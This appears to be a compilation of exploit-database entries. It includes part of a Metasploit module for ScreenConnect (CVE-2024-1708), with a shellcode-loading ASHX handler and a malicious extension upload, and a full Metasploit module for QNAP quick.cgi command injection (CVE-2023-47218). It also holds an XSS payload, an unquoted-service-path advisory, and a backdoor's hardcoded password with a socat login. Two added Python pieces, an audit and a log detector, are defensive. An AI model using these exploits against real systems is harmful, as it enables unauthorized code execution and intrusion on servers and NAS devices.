extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);<br /><br /> [System.Runtime.InteropServices.DllImport("kernel32")]<br /> private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);<br /><br /> public void ProcessRequest(HttpContext #{vars[:var_ctx]})<br /> {<br /> if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {<br /> return;<br /> }<br /><br /> byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);<br /><br /> IntPtr #{vars[:var_func_addr]} = VirtualAlloc(IntPtr.Zero, 
(UIntPtr)#{vars[:var_bytearray]}.Length, 0x3000, (IntPtr)0x40);<br /><br /> Marshal.Copy(#{vars[:var_bytearray]}, 0, #{vars[:var_func_addr]}, #{vars[:var_bytearray]}.Length);<br /><br /> IntPtr #{vars[:var_thread_id]} = IntPtr.Zero;<br /><br /> CreateThread(IntPtr.Zero, UIntPtr.Zero, #{vars[:var_func_addr]}, IntPtr.Zero, 0, ref #{vars[:var_thread_id]});<br /> }<br /><br /> public bool IsReusable { get { return true; } }<br />})<br /> end<br /><br /> manifest_data = %(<?xml version="1.0" encoding="utf-8"?><br /><ExtensionManifest><br /> <Version>#{Faker::App.version}</Version><br /> <Name>#{Faker::App.name}</Name><br /> <Author>#{Faker::Name.name}</Author><br /> <ShortDescription>#{Faker::Lorem.sentence}</ShortDescription><br /> <Components><br /> <WebServiceReference SourceFile="#{payload_ashx}"/><br /> </Components><br /></ExtensionManifest>)<br /><br /> zip_resources = Rex::Zip::Archive.new<br /> zip_resources.add_file("#{plugin_guid}/Manifest.xml", manifest_data)<br /> # We can leverage CVE-2024-1708 to write one level below the extension directory. This enables Linux targets to work.<br /> zip_resources.add_file("#{plugin_guid}/../#{payload_ashx}", payload_data)<br /><br /> #<br /> # 6. 
Upload the payload extension.<br /> #<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'InstallExtension'),<br /> 'keep_cookies' => true,<br /> 'ctype' => 'application/json',<br /> 'data' => "[\"#{Base64.strict_encode64(zip_resources.pack)}\"]",<br /> 'headers' => {<br /> 'X-Anti-Forgery-Token' => anti_forgery_token<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to install extension.')<br /> end<br /><br /> print_status("Uploaded Extension: #{plugin_guid}")<br /><br /> if target['Platform'] == 'win'<br /> # On Windows the current working directory is C:\Windows\System32\ and we don't leak out the install path<br /> # so we use the default installation location...<br /> register_files_for_cleanup("C:\\Program Files (x86)\\ScreenConnect\\App_Extensions\\#{payload_ashx}")<br /> else<br /> # For Linux the current working directory is the install path (/opt/screenconnect) so we can use a relative path...<br /> register_files_for_cleanup("App_Extensions/#{payload_ashx}")<br /> end<br /><br /> begin<br /> #<br /> # 7. Trigger the payload by requesting the extension's .ashx file.<br /> #<br /> if target['Arch'] == ARCH_CMD<br /> payload_data = payload.encoded.gsub('\\', '\\\\\\\\')<br /> else<br /> payload_data = payload.encoded<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'App_Extensions', payload_ashx),<br /> 'keep_cookies' => true,<br /> 'vars_post' => {<br /> vars[:var_payload_key] => Base64.strict_encode64(payload_data)<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to trigger payload.')<br /> end<br /> ensure<br /> #<br /> # 8. 
Ensure we remove the extension when we are done.<br /> #<br /> print_status("Removing Extension: #{plugin_guid}")<br /><br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'UninstallExtension'),<br /> 'keep_cookies' => true,<br /> 'ctype' => 'application/json',<br /> 'data' => "[\"#{plugin_guid}\"]",<br /> 'headers' => {<br /> 'X-Anti-Forgery-Token' => anti_forgery_token<br /> }<br /> )<br /><br /> unless res&.code == 200<br /> print_warning('Failed to remove the extension.')<br /> end<br /> end<br /> end<br /><br /> def get_viewstate(res)<br /> vs_input = res.get_html_document.at('input[name="__VIEWSTATE"]')<br /> unless vs_input&.key? 'value'<br /> print_error('Did not locate the __VIEWSTATE.')<br /> return nil<br /> end<br /><br /> vsgen_input = res.get_html_document.at('input[name="__VIEWSTATEGENERATOR"]')<br /> unless vsgen_input&.key? 'value'<br /> # The __VIEWSTATEGENERATOR is not present in older versions of ScreenConnect (Tested with 20.3.31734).<br /> print_warning('Did not locate the __VIEWSTATEGENERATOR.')<br /> return [vs_input['value'], '']<br /> end<br /><br /> [vs_input['value'], vsgen_input['value']]<br /> end<br />end<br /></code></pre>
<pre><code># Exploit Title: SuperCali Version : 1.1.0 - Reflected XSS
# Date: 2024-23-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://supercali.inforest.com
# Version : 1.1.0
# Tested on: https://softaculous.com/demos/supercali


1) Go to the admin login URL: https://127.0.0.1/SuperCali/login.php
2) Enter the payload in the email field of the login form: "><img src=x onerrora=confirm() onerror=confirm(1)>
3) After clicking Login, the alert fires; the payload is reflected unescaped in the redirect URL: https://127.0.0.1/SuperCali/bad_password.php?email=\%22%3E%3Cimg%20src=x%20onerrora=confirm()%20onerror=confirm(1)%3E&return_to=127.0.0.1/&o=4&c=1&m=02&a=22&y=2024&w=1
</code></pre>
<pre><code>Tosibox Key Service 3.3.0 Local Privilege Escalation


Vendor: Tosibox Oy
Product web page: https://www.tosibox.com
Affected version: <=3.3.0

Summary: TOSIBOX® SoftKey is software that enables a secure connection
between your computer and one or more TOSIBOX® Nodes, giving you full
visibility and control over the network devices connected to the Node.

Desc: The application suffers from an unquoted search path issue impacting
the service 'Tosibox Key Service' for Windows, deployed as part of the Tosibox
software application. This could potentially allow an authorized but non-privileged
local user to execute arbitrary code with elevated privileges on the system.
A successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications,
where it could potentially be executed during application startup or reboot.
If successful, the local user's code would execute with the elevated privileges
of the application.

Tested on: Windows 10 Home 64 bit (build 9200)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5812
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5812.php


30.01.2024

--


C:\Users\ews>sc qc "Tosibox Key Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Tosibox Key Service
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Tosibox\bin\TosiboxKeyService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Tosibox Key Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\ews>
</code></pre>
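An audit for this class of issue, added here as an example and not part of the advisory: it parses `sc qc` output (the sample below is a constructed copy of the listing above), lists the intermediate executables the Service Control Manager would try before the intended one, and returns the quoted path that fixes it.

```python
import re

# Constructed copy of the `sc qc` listing in the advisory above.
SC_QC_SAMPLE = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Tosibox Key Service
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\Tosibox\\bin\\TosiboxKeyService.exe
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Collect the `KEY : value` fields that `sc qc` prints."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def intermediate_paths(binary_path):
    """Executables the Service Control Manager would try before the real one.

    For an unquoted path every space may end the program name, so the
    prefix up to each space (plus .exe) is tried in turn. An empty list
    means the path is quoted or has no spaces and is safe.
    """
    if not binary_path or binary_path.startswith('"'):
        return []
    exe = re.split(r"\.exe\b", binary_path, maxsplit=1, flags=re.I)[0]
    parts = exe.split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]


def quoted_path(binary_path):
    """The remediation: wrap the path in quotes so only the real file is tried."""
    return f'"{binary_path}"' if intermediate_paths(binary_path) else binary_path


def audit_service(text):
    """Summarise one `sc qc` listing: who the service runs as and what to fix."""
    fields = parse_sc_qc(text)
    path = fields.get("BINARY_PATH_NAME", "")
    return {
        "service": fields.get("SERVICE_NAME"),
        "runs_as": fields.get("SERVICE_START_NAME"),
        "intermediate_paths": intermediate_paths(path),
        "fixed_path": quoted_path(path),
    }
```

The `fixed_path` value is what belongs in the service's binary path (set with `sc config <name> binPath=` or by editing the service's ImagePath registry value); the `runs_as` field shows why it matters, since here the service runs as LocalSystem.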
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024
Original source: https://malvuln.com/advisory/68d135936512e88cc0704b90bb3839e0.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Armageddon.r
Vulnerability: Hardcoded Cleartext Credentials
Description: The malware listens on TCP port 5859 and requires authentication. The password "KOrUPtIzEre" is stored in cleartext within the PE file at offset 0x4635f. Connecting to the backdoor returns the value "1"; the password is then entered.
Family: Armageddon
Type: PE32
MD5: 68d135936512e88cc0704b90bb3839e0
Vuln ID: MVID-2024-0670
Dropped files: IP-logs.txt
Disclosure: 02/22/2024


Exploit/PoC:
root@kali:/home/kali# socat - TCP4:x.x.x.x:5859
1 KOrUPtIzEre
1 DESKTOP-2C4IJHO VICTIM Wed


Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
</code></pre>
<pre><code>##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'QNAP QTS and QuTS Hero Unauthenticated Remote Code Execution in quick.cgi',
        'Description' => %q{
          There exists an unauthenticated command injection vulnerability in the QNAP operating system known as QTS and
          QuTS hero. QTS is a core part of the firmware for numerous QNAP entry and mid-level Network Attached Storage
          (NAS) devices, and QuTS hero is a core part of the firmware for numerous QNAP high-end and enterprise NAS devices.

          The vulnerable endpoint is the quick.cgi component, exposed by the device’s web based administration feature.
          The quick.cgi component is present in an uninitialized QNAP NAS device. This component is intended to be used
          during either manual or cloud based provisioning of a QNAP NAS device. Once a device has been successfully
          initialized, the quick.cgi component is disabled on the system.

          An attacker with network access to an uninitialized QNAP NAS device may perform unauthenticated command
          injection, allowing the attacker to execute arbitrary commands on the device.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sfewer-r7', # CVE discovery, MSF module, Rapid7 Blog
          'Spencer McIntyre', # Assistance
          'jheysel-r7' # Docs
        ],
        'References' => [
          ['CVE', '2023-47218'],
          ['URL', 'https://www.qnap.com/en/security-advisory/qsa-23-57'],
          ['URL', 'https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed']
        ],
        'DisclosureDate' => '2024-02-13',
        'Platform' => %w[unix linux],
        'Arch' => [ARCH_CMD],
        'Privileged' => true,
        'Targets' => [ [ 'Default', {} ] ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 80,
          'SSL' => false,
          'FETCH_WRITABLE_DIR' => '/mnt/update'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/cgi-bin/quick/quick.cgi',
      'vars_get' => {
        'func' => Rex::Text.rand_text_alphanumeric(8)
      }
    )

    return CheckCode::Unknown('Connection failed') unless res

    return CheckCode::Safe('Received HTTP status code: 404. This indicates the device is not vulnerable.') if res.code == 404

    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 200

    # This is the content data we get back from a vulnerable system (testing firmware TS-X64_20230926-5.1.2.2533):

    # <?xml version="1.0" encoding="UTF-8"?>
    # <Storage>
    #   <Result>failure</Result>
    #   <Errcode>801</Errcode>
    #   <Errmsg>
    #     No Parameter.
    #   </Errmsg>
    # </Storage>

    return Exploit::CheckCode::Detected if res.body.include? '<Result>failure</Result>'

    CheckCode::Unknown
  end

  def exploit
    # XXX: the command injection has a limit of 127 characters, so we drop our payload to a file and then execute that file.
    bootstrap_file = Rex::Text.rand_text_alphanumeric(8)

    bootstrap_script = [
      '#!/bin/bash',
      payload.encoded
    ].join("\n")

    upload_file(bootstrap_file, bootstrap_script)
    register_file_for_cleanup("#{datastore['FETCH_WRITABLE_DIR']}/#{bootstrap_file}")
    execute_command("bash #{datastore['FETCH_WRITABLE_DIR']}/#{bootstrap_file}")
  end

  def execute_command(cmd)
    cmd_injection_filename = "\"$($(echo -n #{Base64.strict_encode64(cmd)}|base64 -d))\""

    upload_file(Rex::Text.uri_encode(cmd_injection_filename), Rex::Text.rand_text_alphanumeric(8))
    register_file_for_cleanup("#{datastore['FETCH_WRITABLE_DIR']}/#{cmd_injection_filename}")
  end

  def upload_file(file_name, file_data)
    if file_name.length > 127
      fail_with(Failure::BadConfig, "The upload file name is too long (#{file_name.length}), must be < 128 bytes.")
    end

    data = Rex::MIME::Message.new
    data.add_part(file_data, 'text/plain', 'binary', "form-data; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{Rex::Text.rand_text_alphanumeric(8)}\"; #{Rex::Text.rand_text_alphanumeric(8)}=\"#{file_name}\"")

    send_request_cgi(
      'method' => 'POST',
      'uri' => '/cgi-bin/quick/quick.cgi',
      'vars_get' => {
        'func' => 'switch_os',
        'todo' => 'uploaf_firmware_image'
      },
      'headers' => {
        'User-Agent' => 'Mozilla Macintosh'
      },
      'ctype' => "multipart/form-data;boundary=\"#{data.bound}\"",
      'data' => data.to_s
    )
  end
end
</code></pre>
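Detection logic for the requests the module above makes, added here as an example and not part of the Metasploit module: the check method treats a 404 from quick.cgi as the sign of an initialized, non-vulnerable device, so any quick.cgi hit in a web log is worth reviewing, and a POST to the firmware-upload handler (`func=switch_os&todo=uploaf_firmware_image`) is the request the module uses to drop files. The log lines below are constructed in Apache combined format; QNAP's own log layout is not assumed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" access log format is assumed; QNAP's own log layout is not.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: an ordinary page hit, a probe and an upload shaped like the
# module's check and upload_file requests, and a probe that got the 404 an
# initialized device should return.
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Feb/2024:10:01:02 +0000] "GET /cgi-bin/login.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Feb/2024:10:01:10 +0000] "GET /cgi-bin/quick/quick.cgi?func=AbCd1234 HTTP/1.1" 200 210 "-" "Mozilla Macintosh"',
    '10.0.0.9 - - [13/Feb/2024:10:01:11 +0000] "POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1" 200 45 "-" "Mozilla Macintosh"',
    '10.0.0.7 - - [13/Feb/2024:10:02:00 +0000] "GET /cgi-bin/quick/quick.cgi?func=ZyXw9876 HTTP/1.1" 404 0 "-" "curl/8.4.0"',
]


def classify(entry):
    """Return (severity, reason) for a parsed entry, or None when it is not quick.cgi."""
    url = urlsplit(entry["target"])
    if url.path != "/cgi-bin/quick/quick.cgi":
        return None
    query = parse_qs(url.query)
    status = int(entry["status"])
    if entry["method"] == "POST" and "uploaf_firmware_image" in query.get("todo", []):
        return ("high", "firmware-upload handler reached through quick.cgi")
    if status == 200:
        return ("medium", "quick.cgi answered; an initialized device returns 404")
    return ("low", f"quick.cgi probe returned {status}")


def scan_quick_cgi(lines):
    """Return one finding per quick.cgi request, in log order."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        entry = m.groupdict()
        verdict = classify(entry)
        if verdict:
            hits.append({"line": number, "src": entry["ip"], "ua": entry["ua"],
                         "severity": verdict[0], "reason": verdict[1]})
    return hits
```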